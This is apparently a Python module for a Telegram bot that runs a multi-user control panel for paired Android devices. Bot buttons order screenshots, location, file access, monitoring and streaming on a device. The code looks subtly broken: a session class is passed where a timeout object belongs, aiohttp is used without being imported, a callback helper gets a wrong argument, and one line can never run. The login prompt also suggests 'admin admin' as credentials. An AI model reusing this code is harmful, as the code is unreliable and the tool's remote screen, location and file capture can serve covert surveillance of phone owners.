     1→     1→"""
     2→     2→Telegram Bot Module - Multi-user system with per-user isolation.
     3→     3→Each Telegram user gets their own session with isolated devices, files, commands.
     4→     4→"""
     5→     5→
     6→     6→import asyncio
     7→     7→import json
     8→     8→import time
     9→     9→import logging
    10→    10→import urllib.parse
    11→    11→from typing import Optional
    12→    12→from datetime import datetime
    13→    13→
    14→    14→from aiohttp import ClientSession
    15→    15→
    16→    16→from .config import (
    17→    17→    BOT_TOKEN, ADMIN_CHAT_ID, TG_RATE_LIMIT, TG_DEDUP_SECONDS,
    18→    18→    SERVER_DOMAIN, SERVER_URL, PAIRING_CODE_CHARS, PAIRING_CODE_LENGTH,
    19→    19→    PAIRING_CODE_EXPIRE_SECONDS, LINK_CODE_COOLDOWN, VERSION
    20→    20→)
    21→    21→from .store import store
    22→    22→from .commands import COMMAND_REGISTRY, CMD_CATEGORIES, get_commands_by_category
    23→    23→from .firebase_client import firebase_connected
    24→    24→
    25→    25→logger = logging.getLogger("telegram")
    26→    26→
    27→    27→API_BASE = f"https://api.telegram.org/bot{BOT_TOKEN}"
    28→    28→_tg_session: ClientSession = None
    29→    29→polling_active = False
    30→    30→tg_offset = 0
    31→    31→
    32→    32→
    33→    33→async def init_session():
    34→    34→    global _tg_session
    35→    35→    if _tg_session is None or _tg_session.closed:
    36→    36→        _tg_session = ClientSession(timeout=ClientSession(total=30))
    37→    37→
    38→    38→
    39→    39→async def close():
    40→    40→    global _tg_session
    41→    41→    if _tg_session and not _tg_session.closed:
    42→    42→        await _tg_session.close()
    43→    43→
    44→    44→
    45→    45→# ─── Telegram API Helpers ─────────────────────────────────────
    46→    46→
    47→    47→async def api_call(method: str, payload: dict = None, timeout: int = 30) -> dict:
    48→    48→    """Make a Telegram Bot API call."""
    49→    49→    await init_session()
    50→    50→    url = f"{API_BASE}/{method}"
    51→    51→    try:
    52→    52→        async with _tg_session.post(url, json=payload or {}, timeout=ClientSession(total=timeout)) as resp:
    53→    53→            result = await resp.json()
    54→    54→            if not result.get('ok'):
    55→    55→                logger.error(f"TG API error: {method} -> {result}")
    56→    56→            return result
    57→    57→        store.messages_sent += 1
    58→    58→    except Exception as e:
    59→    59→        logger.error(f"TG API call failed: {method} -> {e}")
    60→    60→        return {"ok": False, "description": str(e)}
    61→    61→
    62→    62→
    63→    63→async def send_message(chat_id: str, text: str, parse_mode: str = "HTML",
    64→    64→                       reply_markup: dict = None, reply_to_message_id: int = None) -> dict:
    65→    65→    payload = {
    66→    66→        "chat_id": chat_id,
    67→    67→        "text": text,
    68→    68→        "parse_mode": parse_mode,
    69→    69→        "disable_web_page_preview": True,
    70→    70→    }
    71→    71→    if reply_markup:
    72→    72→        payload["reply_markup"] = reply_markup
    73→    73→    if reply_to_message_id:
    74→    74→        payload["reply_to_message_id"] = reply_to_message_id
    75→    75→    result = await api_call("sendMessage", payload)
    76→    76→    store.messages_sent += 1
    77→    77→    return result
    78→    78→
    79→    79→
    80→    80→async def send_photo(chat_id: str, photo_data: bytes, caption: str = "", reply_markup: dict = None) -> dict:
    81→    81→    await init_session()
    82→    82→    url = f"{API_BASE}/sendPhoto"
    83→    83→    data = aiohttp.FormData()
    84→    84→    data.add_field("chat_id", str(chat_id))
    85→    85→    data.add_field("photo", photo_data, filename="photo.jpg", content_type="image/jpeg")
    86→    86→    if caption:
    87→    87→        data.add_field("caption", caption, content_type="text/plain")
    88→    88→    if reply_markup:
    89→    89→        data.add_field("reply_markup", json.dumps(reply_markup), content_type="application/json")
    90→    90→    try:
    91→    91→        async with _tg_session.post(url, data=data, timeout=ClientSession(total=60)) as resp:
    92→    92→            result = await resp.json()
    93→    93→            store.messages_sent += 1
    94→    94→            return result
    95→    95→    except Exception as e:
    96→    96→        logger.error(f"TG send_photo failed: {e}")
    97→    97→        return {"ok": False}
    98→    98→
    99→    99→
   100→   100→async def send_document(chat_id: str, file_data: bytes, filename: str = "file", caption: str = "") -> dict:
   101→   101→    await init_session()
   102→   102→    url = f"{API_BASE}/sendDocument"
   103→   103→    data = aiohttp.FormData()
   104→   104→    data.add_field("chat_id", str(chat_id))
   105→   105→    data.add_field("document", file_data, filename=filename)
   106→   106→    if caption:
   107→   107→        data.add_field("caption", caption)
   108→   108→    try:
   109→   109→        async with _tg_session.post(url, data=data, timeout=ClientSession(total=120)) as resp:
   110→   110→            result = await resp.json()
   111→   111→            store.messages_sent += 1
   112→   112→            return result
   113→   113→    except Exception as e:
   114→   114→        logger.error(f"TG send_document failed: {e}")
   115→   115→        return {"ok": False}
   116→   116→
   117→   117→
   118→   118→async def answer_callback_query(callback_query_id: str, text: str = "", show_alert: bool = False):
   119→   119→    await api_call("answerCallbackQuery", {
   120→   120→        "callback_query_id": callback_query_id,
   121→   121→        "text": text,
   122→   122→        "show_alert": show_alert,
   123→   123→    })
   124→   124→
   125→   125→
   126→   126→# ─── User Session Management (Multi-User) ─────────────────────
   127→   127→
   128→   128→def get_or_create_tg_session(chat_id: str) -> dict:
   129→   129→    """Get or create an isolated Telegram user session."""
   130→   130→    if chat_id not in store.tg_sessions:
   131→   131→        store.tg_sessions[chat_id] = {
   132→   132→            "chat_id": chat_id,
   133→   133→            "authenticated": False,
   134→   134→            "user_id": None,
   135→   135→            "selected_device": None,
   136→   136→            "current_menu": "main",
   137→   137→            "created_at": datetime.utcnow().isoformat(),
   138→   138→            "last_activity": time.time(),
   139→   139→        }
   140→   140→    store.tg_sessions[chat_id]["last_activity"] = time.time()
   141→   141→    return store.tg_sessions[chat_id]
   142→   142→
   143→   143→
   144→   144→def get_user_for_tg(chat_id: str) -> Optional[dict]:
   145→   145→    """Get the user associated with a Telegram chat."""
   146→   146→    session = store.tg_sessions.get(chat_id)
   147→   147→    if session and session.get("user_id"):
   148→   148→        return store.users.get(session["user_id"])
   149→   149→    return None
   150→   150→
   151→   151→
   152→   152→def get_devices_for_tg(chat_id: str) -> list:
   153→   153→    """Get devices accessible by this Telegram user."""
   154→   154→    session = store.tg_sessions.get(chat_id)
   155→   155→    if not session:
   156→   156→        return []
   157→   157→    user_id = session.get("user_id")
   158→   158→    if not user_id:
   159→   159→        # Unauthenticated users see nothing
   160→   160→        return []
   161→   161→    user = store.users.get(user_id)
   162→   162→    if not user:
   163→   163→        return []
   164→   164→    if user.get("role") == "admin":
   165→   165→        return list(store.devices.values())
   166→   166→    return [d for d in store.devices.values() if d.get("owner_id") == user_id]
   167→   167→
   168→   168→
   169→   169→# ─── Authentication ──────────────────────────────────────────
   170→   170→
   171→   171→async def authenticate_tg_user(chat_id: str, username: str, password: str) -> bool:
   172→   172→    """Authenticate a Telegram user with their platform credentials."""
   173→   173→    user = await store.authenticate_user(username, password)
   174→   174→    if user:
   175→   175→        session = get_or_create_tg_session(chat_id)
   176→   176→        session["authenticated"] = True
   177→   177→        session["user_id"] = user["id"]
   178→   178→        return True
   179→   179→    return False
   180→   180→
   181→   181→
   182→   182→# ─── Keyboard Builders ────────────────────────────────────────
   183→   183→
   184→   184→def inline_keyboard(buttons: list) -> dict:
   185→   185→    """Build inline keyboard markup. buttons is list of rows, each row is list of [text, callback_data]."""
   186→   186→    return {
   187→   187→        "inline_keyboard": [
   188→   188→            [{"text": text, "callback_data": data} for text, data in row]
   189→   189→            for row in buttons
   190→   190→        ]
   191→   191→    }
   192→   192→
   193→   193→
   194→   194→def main_menu_keyboard(chat_id: str) -> dict:
   195→   195→    session = get_or_create_tg_session(chat_id)
   196→   196→    is_auth = session.get("authenticated", False)
   197→   197→    
   198→   198→    buttons = [
   199→   199→        [("📡 الحالة", "srv_status")],
   200→   200→    ]
   201→   201→    
   202→   202→    if is_auth:
   203→   203→        devices = get_devices_for_tg(chat_id)
   204→   204→        online_count = sum(1 for d in devices if store._device_last_online.get(d['id'], False))
   205→   205→        buttons = [
   206→   206→            [(
   207→   207→                f"📱 الأجهزة ({len(devices)} - {online_count} متصل)",
   208→   208→                "menu_devices"
   209→   209→            )],
   210→   210→            [("📊 إحصائيات", "srv_stats"), ("📋 السجلات", "srv_logs")],
   211→   211→            [("📡 حالة الخادم", "srv_status"), ("⚙️ الإعدادات", "srv_settings")],
   212→   212→            [("🔗 ربط جهاز", "do_link")],
   213→   213→        ]
   214→   214→        if len(devices) > 0:
   215→   215→            buttons.insert(1, [("🎮 إرسال أمر", "menu_commands")])
   216→   216→    else:
   217→   217→        buttons = [
   218→   218→            [("🔐 تسجيل الدخول", "do_login")],
   219→   219→            [("📡 حالة الخادم", "srv_status")],
   220→   220→        ]
   221→   221→    
   222→   222→    return inline_keyboard(buttons)
   223→   223→
   224→   224→
   225→   225→def device_list_keyboard(chat_id: str) -> dict:
   226→   226→    devices = get_devices_for_tg(chat_id)
   227→   227→    if not devices:
   228→   228→        return inline_keyboard([[("لا توجد أجهزة", "back_main")]])
   229→   229→    
   230→   230→    buttons = []
   231→   231→    for dev in devices[:10]:  # Max 10 devices
   232→   232→        online = store._device_last_online.get(dev['id'], False)
   233→   233→        status = "🟢" if online else "🔴"
   234→   234→        name = dev.get('name', dev['model'])[:20]
   235→   235→        buttons.append([(
   236→   236→            f"{status} {name}",
   237→   237→            f"dev_{dev['id']}"
   238→   238→        )])
   239→   239→    buttons.append([("🔙 رجوع", "back_main")])
   240→   240→    return inline_keyboard(buttons)
   241→   241→
   242→   242→
   243→   243→def device_menu_keyboard(device_id: str) -> dict:
   244→   244→    buttons = [
   245→   245→        [("📸 لقطة شاشة", f"quick_screenshot_{device_id}")],
   246→   246→        [("📍 الموقع", f"quick_location_{device_id}"), ("🔋 البطارية", f"quick_battery_{device_id}")],
   247→   247→        [("📊 البيانات", f"submenu_data_{device_id}"),
   248→   248→         ("🎮 التحكم", f"submenu_control_{device_id}")],
   249→   249→        [("📁 الملفات", f"submenu_files_{device_id}"),
   250→   250→         ("🔒 الأمان", f"submenu_security_{device_id}")],
   251→   251→        [("🔍 المراقبة", f"submenu_monitor_{device_id}"),
   252→   252→         ("📡 البث", f"submenu_streaming_{device_id}")],
   253→   253→        [("🔗 فك الربط", f"do_unlink_{device_id}")],
   254→   254→        [("🔙 رجوع", "menu_devices")],
   255→   255→    ]
   256→   256→    return inline_keyboard(buttons)
   257→   257→
   258→   258→
   259→   259→def category_commands_keyboard(category: str, device_id: str) -> dict:
   260→   260→    cmds = get_commands_by_category(category)
   261→   261→    cat_info = CMD_CATEGORIES.get(category, {})
   262→   262→    cat_name = cat_info.get('name', category)
   263→   263→    
   264→   264→    buttons = [[(f"📂 {cat_name}", "noop")]]  # Header
   265→   265→    
   266→   266→    row = []
   267→   267→    for key, cmd_def in cmds.items():
   268→   268→        btn_text = f"{cmd_def.get('icon', '')} {cmd_def.get('name', key)}"
   269→   269→        row.append((btn_text, f"exec_{key}_{device_id}"))
   270→   270→        if len(row) == 2:
   271→   271→            buttons.append(row)
   272→   272→            row = []
   273→   273→    if row:
   274→   274→        buttons.append(row)
   275→   275→    
   276→   276→    buttons.append([("🔙 رجوع", f"dev_{device_id}")])
   277→   277→    return inline_keyboard(buttons)
   278→   278→
   279→   279→
   280→   280→def quick_actions_keyboard(device_id: str) -> dict:
   281→   281→    buttons = [
   282→   282→        [("📸 لقطة شاشة", f"quick_screenshot_{device_id}"),
   283→   283→         ("📍 الموقع", f"quick_location_{device_id}")],
   284→   284→        [("🔋 البطارية", f"quick_battery_{device_id}"),
   285→   285→         ("ℹ️ معلومات", f"exec_info_{device_id}")],
   286→   286→        [("📱 التطبيقات", f"exec_installed_apps_{device_id}"),
   287→   287→         ("📶 WiFi", f"exec_wifi_info_{device_id}")],
   288→   288→        [("🔙 رجوع", f"dev_{device_id}")],
   289→   289→    ]
   290→   290→    return inline_keyboard(buttons)
   291→   291→
   292→   292→
   293→   293→def command_category_picker(device_id: str) -> dict:
   294→   294→    buttons = []
   295→   295→    for cat_id, cat_info in CMD_CATEGORIES.items():
   296→   296→        cmds = get_commands_by_category(cat_id)
   297→   297→        if cmds:
   298→   298→            buttons.append([(
   299→   299→                f"{cat_info['icon']} {cat_info['name']} ({len(cmds)})",
   300→   300→                f"submenu_{cat_id}_{device_id}"
   301→   301→            )])
   302→   302→    buttons.append([("🔙 رجوع", f"dev_{device_id}")])
   303→   303→    return inline_keyboard(buttons)
   304→   304→
   305→   305→
   306→   306→# ─── Message Handlers ─────────────────────────────────────────
   307→   307→
   308→   308→async def handle_message(chat_id: str, text: str, message_id: int, from_user: dict):
   309→   309→    """Handle incoming Telegram text messages."""
   310→   310→    text = text.strip()
   311→   311→    session = get_or_create_tg_session(chat_id)
   312→   312→    
   313→   313→    # Dedup
   314→   314→    dedup_key = f"{chat_id}:{message_id}"
   315→   315→    if dedup_key in store._tg_processed_messages:
   316→   316→        return
   317→   317→    store._tg_processed_messages.add(dedup_key)
   318→   318→    if len(store._tg_processed_messages) > 200:
   319→   319→        store._tg_processed_messages = set(list(store._tg_processed_messages)[-100:])
   320→   320→    
   321→   321→    # Rate limit
   322→   322→    if not store.check_rate_limit(f"tg_chat_{chat_id}", TG_RATE_LIMIT, 30):
   323→   323→        await send_message(chat_id, "⏳ أنت ترسل رسائل بسرعة كبيرة. انتظر قليلاً.")
   324→   324→        return
   325→   325→    
   326→   326→    # Handle authentication state
   327→   327→    if not session.get("authenticated"):
   328→   328→        await handle_unauthenticated(chat_id, text, session)
   329→   329→        return
   330→   330→    
   331→   331→    # Handle commands
   332→   332→    if text.startswith("/"):
   333→   333→        cmd = text.split()[0].lower()
   334→   334→        await handle_command(chat_id, cmd, text, session)
   335→   335→    else:
   336→   336→        await send_message(chat_id, "استخدم الأزرار أدناه أو الأوامر المتاحة.\n"
   337→   337→                         "أرسل /help لعرض قائمة الأوامر.",
   338→   338→                         reply_markup=main_menu_keyboard(chat_id))
   339→   339→
   340→   340→
   341→   341→async def handle_unauthenticated(chat_id: str, text: str, session: dict):
   342→   342→    """Handle messages from unauthenticated Telegram users."""
   343→   343→    # Auto-authenticate admin chat
   344→   344→    if str(chat_id) == str(ADMIN_CHAT_ID):
   345→   345→        admin_user = None
   346→   346→        for u in store.users.values():
   347→   347→            if u.get('role') == 'admin':
   348→   348→                admin_user = u
   349→   349→                break
   350→   350→        if admin_user:
   351→   351→            session["authenticated"] = True
   352→   352→            session["user_id"] = admin_user["id"]
   353→   353→            await send_message(chat_id, f"✅ مرحباً {admin_user['username']}!\n"
   354→   354→                             f"تم تسجيل الدخول تلقائياً كمسؤول.\n\n"
   355→   355→                             f"معرف المستخدم: <code>{admin_user['id']}</code>",
   356→   356→                             reply_markup=main_menu_keyboard(chat_id))
   357→   357→            return
   358→   358→    
   359→   359→    # Parse login attempt: "username password"
   360→   360→    parts = text.split(None, 1)
   361→   361→    if len(parts) == 2:
   362→   362→        username, password = parts
   363→   363→        if await authenticate_tg_user(chat_id, username, password):
   364→   364→            user = get_user_for_tg(chat_id)
   365→   365→            await send_message(chat_id, f"✅ تم تسجيل الدخول بنجاح!\n"
   366→   366→                             f"مرحباً {user['username']}!\n"
   367→   367→                             f"معرفك: <code>{user['id']}</code>\n"
   368→   368→                             f"البريد: {user['email']}",
   369→   369→                             reply_markup=main_menu_keyboard(chat_id))
   370→   370→        else:
   371→   371→            await send_message(chat_id, "❌ خطأ في اسم المستخدم أو كلمة المرور.\n"
   372→   372→                             "أرسل: <code>اسم_المستخدم كلمة_المرور</code>")
   373→   373→        return
   374→   374→    
   375→   375→    await send_message(chat_id, "🔐 يجب تسجيل الدخول أولاً\n\n"
   376→   376→                     "أرسل: <code>اسم_المستخدم كلمة_المرور</code>\n\n"
   377→   377→                     "مثال:\n<code>admin admin</code>",
   378→   378→                     reply_markup=inline_keyboard([[("🔐 تسجيل الدخول", "do_login")]]))
   379→   379→
   380→   380→
   381→   381→async def handle_command(chat_id: str, cmd: str, full_text: str, session: dict):
   382→   382→    """Handle slash commands from authenticated users."""
   383→   383→    user = get_user_for_tg(chat_id)
   384→   384→    if not user:
   385→   385→        await handle_unauthenticated(chat_id, full_text, session)
   386→   386→        return
   387→   387→    
   388→   388→    args = full_text.split()[1:] if len(full_text.split()) > 1 else []
   389→   389→    devices = get_devices_for_tg(chat_id)
   390→   390→    
   391→   391→    if cmd == "/start":
   392→   392→        await send_message(chat_id,
   393→   393→            f"👋 مرحباً {user['username']}!\n\n"
   394→   394→            f"🤖 بوت أبو زهرا للإدارة\n"
   395→   395→            f"📌 الإصدار {VERSION}\n"
   396→   396→            f"🌐 {SERVER_DOMAIN}\n\n"
   397→   397→            f"استخدم الأزرار أدناه للتحكم في أجهزتك.",
   398→   398→            reply_markup=main_menu_keyboard(chat_id))
   399→   399→    
   400→   400→    elif cmd == "/help":
   401→   401→        help_text = (
   402→   402→            "📖 <b>قائمة الأوامر</b>\n\n"
   403→   403→            "/start - القائمة الرئيسية\n"
   404→   404→            "/menu - عرض القائمة\n"
   405→   405→            "/devices - قائمة الأجهزة\n"
   406→   406→            "/link - إنشاء كود ربط\n"
   407→   407→            "/unlink <معرف_الجهاز> - فك الربط\n"
   408→   408→            "/status - حالة الخادم\n"
   409→   409→            "/stats - الإحصائيات\n"
   410→   410→            "/logs - آخر السجلات\n"
   411→   411→            "/settings - الإعدادات\n"
   412→   412→            "/search <بحث> - البحث في الأجهزة\n\n"
   413→   413→            "يمكنك أيضاً التحكم مباشرة عبر الأزرار."
   414→   414→        )
   415→   415→        await send_message(chat_id, help_text, reply_markup=main_menu_keyboard(chat_id))
   416→   416→    
   417→   417→    elif cmd == "/menu":
   418→   418→        await send_message(chat_id, "📋 القائمة الرئيسية:", reply_markup=main_menu_keyboard(chat_id))
   419→   419→    
   420→   420→    elif cmd == "/devices":
   421→   421→        if not devices:
   422→   422→            await send_message(chat_id, "📱 لا توجد أجهزة مسجلة.\nاستخدم /link لإنشاء كود ربط.")
   423→   423→            return
   424→   424→        text = f"📱 <b>الأجهزة ({len(devices)})</b>\n\n"
   425→   425→        for dev in devices:
   426→   426→            online = store._device_last_online.get(dev['id'], False)
   427→   427→            status = "🟢 متصل" if online else "🔴 غير متصل"
   428→   428→            battery = dev.get('battery', 'N/A')
   429→   429→            text += f"{'🟢' if online else '🔴'} <code>{dev['id']}</code>\n"
   430→   430→            text += f"   {dev.get('model', 'Unknown')} | بطارية: {battery}% | {status}\n\n"
   431→   431→        await send_message(chat_id, text, reply_markup=device_list_keyboard(chat_id))
   432→   432→    
   433→   433→    elif cmd == "/link":
   434→   434→        code_data = store.generate_pairing_code(user['id'])
   435→   435→        code = code_data['code']
   436→   436→        await send_message(chat_id,
   437→   437→            f"🔗 <b>كود الربط</b>\n\n"
   438→   438→            f"<code>{code}</code>\n\n"
   439→   439→            f"⏰ صالح لمدة {PAIRING_CODE_EXPIRE_SECONDS // 60} دقائق\n"
   440→   440→            f"📱 أدخل هذا الكود في تطبيق الجهاز للربط.",
   441→   441→            reply_markup=main_menu_keyboard(chat_id))
   442→   442→    
   443→   443→    elif cmd == "/unlink" and args:
   444→   444→        device_id = args[0]
   445→   445→        success = await store.unlink_device(device_id, user['id'])
   446→   446→        if success:
   447→   447→            await send_message(chat_id, f"✅ تم فك ربط الجهاز {device_id}", reply_markup=main_menu_keyboard(chat_id))
   448→   448→        else:
   449→   449→            await send_message(chat_id, "❌ فشل فك الربط. تأكد من معرف الجهاز.")
   450→   450→    
   451→   451→    elif cmd == "/status":
   452→   452→        stats = store.get_stats()
   453→   453→        await send_message(chat_id,
   454→   454→            f"📡 <b>حالة الخادم</b>\n\n"
   455→   455→            f"✅ يعمل\n"
   456→   456→            f"⏱️ مدة التشغيل: {stats['uptime'] // 3600}س {stats['uptime'] % 3600 // 60}د\n"
   457→   457→            f"📱 أجهزة: {stats['devices_total']} ({stats['devices_online']} متصل)\n"
   458→   458→            f"🎮 أوامر معلقة: {stats['commands_pending']}\n"
   459→   459→            f"🔥 Firebase: {'متصل' if firebase_connected else 'غير متصل'}\n"
   460→   460→            f"📊 الإصدار: {VERSION}",
   461→   461→            reply_markup=main_menu_keyboard(chat_id))
   462→   462→    
   463→   463→    elif cmd == "/stats":
   464→   464→        stats = store.get_stats()
   465→   465→        await send_message(chat_id,
   466→   466→            f"📊 <b>الإحصائيات</b>\n\n"
   467→   467→            f"📱 إجمالي الأجهزة: {stats['devices_total']}\n"
   468→   468→            f"🟢 متصل: {stats['devices_online']}\n"
   469→   469→            f"🔴 غير متصل: {stats['devices_offline']}\n"
   470→   470→            f"🎮 إجمالي الأوامر: {stats['commands_total']}\n"
   471→   471→            f"⏳ أوامر معلقة: {stats['commands_pending']}\n"
   472→   472→            f"✅ أوامر مكتملة: {stats['commands_completed']}\n"
   473→   473→            f"📋 الأحداث: {stats['events_count']}\n"
   474→   474→            f"📁 ملفات نشطة: {stats['files_active']}\n"
   475→   475→            f"📡 طلبات API: {stats['api_hits']}\n"
   476→   476→            f"💬 رسائل تيليجرام: {stats['messages_sent']}\n"
   477→   477→            f"👤 المستخدمون: {stats['users_total']}",
   478→   478→            reply_markup=main_menu_keyboard(chat_id))
   479→   479→    
   480→   480→    elif cmd == "/logs":
   481→   481→        events = await store.get_events(limit=15)
   482→   482→        if not events:
   483→   483→            await send_message(chat_id, "📋 لا توجد سجلات.", reply_markup=main_menu_keyboard(chat_id))
   484→   484→            return
   485→   485→        text = "📋 <b>آخر السجلات</b>\n\n"
   486→   486→        for evt in events:
   487→   487→            icon = {"info": "ℹ️", "success": "✅", "warning": "⚠️", "error": "❌"}.get(evt.get('level', ''), "ℹ️")
   488→   488→            text += f"{icon} {evt.get('event', '')}\n"
   489→   489→            if evt.get('details'):
   490→   490→                text += f"   {evt['details'][:100]}\n"
   491→   491→        await send_message(chat_id, text, reply_markup=main_menu_keyboard(chat_id))
   492→   492→    
   493→   493→    elif cmd == "/settings":
   494→   494→        text = "⚙️ <b>الإعدادات</b>\n\n"
   495→   495→        for key, value in store.settings.items():
   496→   496→            text += f"• {key}: {value}\n"
   497→   497→        await send_message(chat_id, text, reply_markup=main_menu_keyboard(chat_id))
   498→   498→    
   499→   499→    elif cmd == "/search" and args:
   500→   500→        query = " ".join(args).lower()
   501→   501→        results = [d for d in devices if 
   502→   502→                   query in d.get('name', '').lower() or 
   503→   503→                   query in d.get('model', '').lower() or
   504→   504→                   query in d.get('id', '').lower()]
   505→   505→        if not results:
   506→   506→            await send_message(chat_id, "🔍 لم يتم العثور على نتائج.")
   507→   507→        else:
   508→   508→            text = f"🔍 <b>نتائج البحث ({len(results)})</b>\n\n"
   509→   509→            for dev in results:
   510→   510→                online = store._device_last_online.get(dev['id'], False)
   511→   511→                text += f"{'🟢' if online else '🔴'} <code>{dev['id']}</code> - {dev.get('model', '')}\n"
   512→   512→            await send_message(chat_id, text)
   513→   513→    
   514→   514→    elif cmd in COMMAND_REGISTRY:
   515→   515→        # Direct command execution: /screenshot, /location, etc.
   516→   516→        if not session.get("selected_device"):
   517→   517→            await send_message(chat_id, "⚠️ اختر جهازاً أولاً من قائمة الأجهزة.",
   518→   518→                             reply_markup=device_list_keyboard(chat_id))
   519→   519→            return
   520→   520→        device_id = session["selected_device"]
   521→   521→        await execute_device_command(chat_id, cmd.lstrip("/"), device_id, user)
   522→   522→    
   523→   523→    else:
   524→   524→        await send_message(chat_id, "❓ أمر غير معروف. أرسل /help لعرض الأوامر.",
   525→   525→                         reply_markup=main_menu_keyboard(chat_id))
   526→   526→
   527→   527→
   528→   528→# ─── Callback Query Handlers ──────────────────────────────────
   529→   529→
   530→   530→async def handle_callback(chat_id: str, callback_data: str, message_id: int):
   531→   531→    """Handle inline button presses."""
   532→   532→    session = get_or_create_tg_session(chat_id)
   533→   533→    user = get_user_for_tg(chat_id)
   534→   534→    
   535→   535→    # Unauthenticated actions
   536→   536→    if callback_data == "do_login":
   537→   537→        await answer_callback_query(callback_data=message_id, text="أرسل: اسم_المستخدم كلمة_المرور", show_alert=False)
   538→   538→        return
   539→   539→    
   540→   540→    if callback_data == "do_register":
   541→   541→        await send_message(chat_id, "📝 للتسجيل، تواصل مع المسؤول.")
   542→   542→        return
   543→   543→    
   544→   544→    if not session.get("authenticated") or not user:
   545→   545→        await answer_callback_query(callback_data=message_id, text="سجل دخولك أولاً", show_alert=True)
   546→   546→        return
   547→   547→    
   548→   548→    await answer_callback_query(callback_data=message_id)
   549→   549→    devices = get_devices_for_tg(chat_id)
   550→   550→    
   551→   551→    # ─── Navigation ────────────────────────────────────────────
   552→   552→    if callback_data == "back_main":
   553→   553→        await send_message(chat_id, "📋 القائمة الرئيسية:", reply_markup=main_menu_keyboard(chat_id))
   554→   554→    
   555→   555→    elif callback_data == "menu_devices":
   556→   556→        if not devices:
   557→   557→            await send_message(chat_id, "📱 لا توجد أجهزة. استخدم /link لربط جهاز.")
   558→   558→        else:
   559→   559→            text = f"📱 <b>اختر جهازاً ({len(devices)})</b>"
   560→   560→            await send_message(chat_id, text, reply_markup=device_list_keyboard(chat_id))
   561→   561→    
   562→   562→    elif callback_data == "menu_commands":
   563→   563→        if not session.get("selected_device"):
   564→   564→            await send_message(chat_id, "⚠️ اختر جهازاً أولاً.", reply_markup=device_list_keyboard(chat_id))
   565→   565→        else:
   566→   566→            await send_message(chat_id, "🎮 اختر فئة الأوامر:",
   567→   567→                             reply_markup=command_category_picker(session["selected_device"]))
   568→   568→    
   569→   569→    elif callback_data == "do_link":
   570→   570→        code_data = store.generate_pairing_code(user['id'])
   571→   571→        code = code_data['code']
   572→   572→        await send_message(chat_id,
   573→   573→            f"🔗 <b>كود الربط</b>\n\n<code>{code}</code>\n\n"
   574→   574→            f"⏰ صالح لمدة {PAIRING_CODE_EXPIRE_SECONDS // 60} دقائق",
   575→   575→            reply_markup=main_menu_keyboard(chat_id))
   576→   576→    
   577→   577→    # ─── Server Management ────────────────────────────────────
   578→   578→    elif callback_data == "srv_status":
   579→   579→        stats = store.get_stats()
   580→   580→        await send_message(chat_id,
   581→   581→            f"📡 <b>حالة الخادم</b>\n✅ يعمل | ⏱️ {stats['uptime'] // 3600}س | "
   582→   582→            f"📱 {stats['devices_online']}/{stats['devices_total']} | "
   583→   583→            f"🔥 {'متصل' if firebase_connected else 'غير متصل'} | v{VERSION}")
   584→   584→    
   585→   585→    elif callback_data == "srv_stats":
   586→   586→        stats = store.get_stats()
   587→   587→        await send_message(chat_id,
   588→   588→            f"📊 الأجهزة: {stats['devices_total']} | متصل: {stats['devices_online']} | "
   589→   589→            f"أوامر: {stats['commands_completed']}/{stats['commands_total']} | "
   590→   590→            f"أحداث: {stats['events_count']} | ملفات: {stats['files_active']}")
   591→   591→    
   592→   592→    elif callback_data == "srv_logs":
   593→   593→        events = await store.get_events(limit=10)
   594→   594→        text = "📋 آخر السجلات:\n"
   595→   595→        for evt in events[:5]:
   596→   596→            icon = {"info": "ℹ️", "success": "✅", "warning": "⚠️", "error": "❌"}.get(evt.get('level', ''), "ℹ️")
   597→   597→            text += f"{icon} {evt.get('event', '')[:60]}\n"
   598→   598→        await send_message(chat_id, text if len(text) > 25 else "📋 لا توجد سجلات.")
   599→   599→    
   600→   600→    elif callback_data == "srv_settings":
   601→   601→        text = "⚙️ الإعدادات:\n"
   602→   602→        for k, v in store.settings.items():
   603→   603→            text += f"• {k}: {v}\n"
   604→   604→        await send_message(chat_id, text)
   605→   605→    
   606→   606→    # ─── Device Selection ─────────────────────────────────────
   607→   607→    elif callback_data.startswith("dev_"):
   608→   608→        device_id = callback_data[4:]
   609→   609→        device = store.devices.get(device_id)
   610→   610→        if not device:
   611→   611→            await send_message(chat_id, "❌ الجهاز غير موجود.")
   612→   612→            return
   613→   613→        session["selected_device"] = device_id
   614→   614→        online = store._device_last_online.get(device_id, False)
   615→   615→        battery = device.get('battery', 'N/A')
   616→   616→        model = device.get('model', 'Unknown')
   617→   617→        brand = device.get('brand', '')
   618→   618→        os_ver = device.get('os', '')
   619→   619→        
   620→   620→        text = (
   621→   621→            f"📱 <b>{model}</b>\n\n"
   622→   622→            f"🏷️ المعرف: <code>{device_id}</code>\n"
   623→   623→            f"🏢 الشركة: {brand}\n"
   624→   624→            f"Android: {os_ver}\n"
   625→   625→            f"🔋 البطارية: {battery}%\n"
   626→   626→            f"{'🟢 متصل' if online else '🔴 غير متصل'}\n"
   627→   627→            f"📅 الربط: {device.get('created_at', 'N/A')[:10]}"
   628→   628→        )
   629→   629→        await send_message(chat_id, text, reply_markup=device_menu_keyboard(device_id))
   630→   630→    
   631→   631→    # ─── Quick Actions ────────────────────────────────────────
   632→   632→    elif callback_data.startswith("quick_screenshot_"):
   633→   633→        device_id = callback_data[len("quick_screenshot_"):]
   634→   634→        await execute_device_command(chat_id, "screenshot", device_id, user)
   635→   635→    
   636→   636→    elif callback_data.startswith("quick_location_"):
   637→   637→        device_id = callback_data[len("quick_location_"):]
   638→   638→        await execute_device_command(chat_id, "location", device_id, user)
   639→   639→    
   640→   640→    elif callback_data.startswith("quick_battery_"):
   641→   641→        device_id = callback_data[len("quick_battery_"):]
   642→   642→        await execute_device_command(chat_id, "battery", device_id, user)
   643→   643→    
   644→   644→    # ─── Category Submenus ───────────────────────────────────
   645→   645→    elif callback_data.startswith("submenu_"):
   646→   646→        parts = callback_data.split("_", 2)  # submenu_category_device_id
   647→   647→        if len(parts) >= 3:
   648→   648→            category = parts[1]
   649→   649→            device_id = "_".join(parts[2:])
   650→   650→            cat_info = CMD_CATEGORIES.get(category, {})
   651→   651→            await send_message(chat_id, f"📂 {cat_info.get('name', category)}:",
   652→   652→                             reply_markup=category_commands_keyboard(category, device_id))
   653→   653→    
   654→   654→    # ─── Execute Command ──────────────────────────────────────
   655→   655→    elif callback_data.startswith("exec_"):
   656→   656→        parts = callback_data.split("_", 2)
   657→   657→        if len(parts) >= 3:
   658→   658→            cmd_key = parts[1]
   659→   659→            device_id = "_".join(parts[2:])
   660→   660→            await execute_device_command(chat_id, cmd_key, device_id, user)
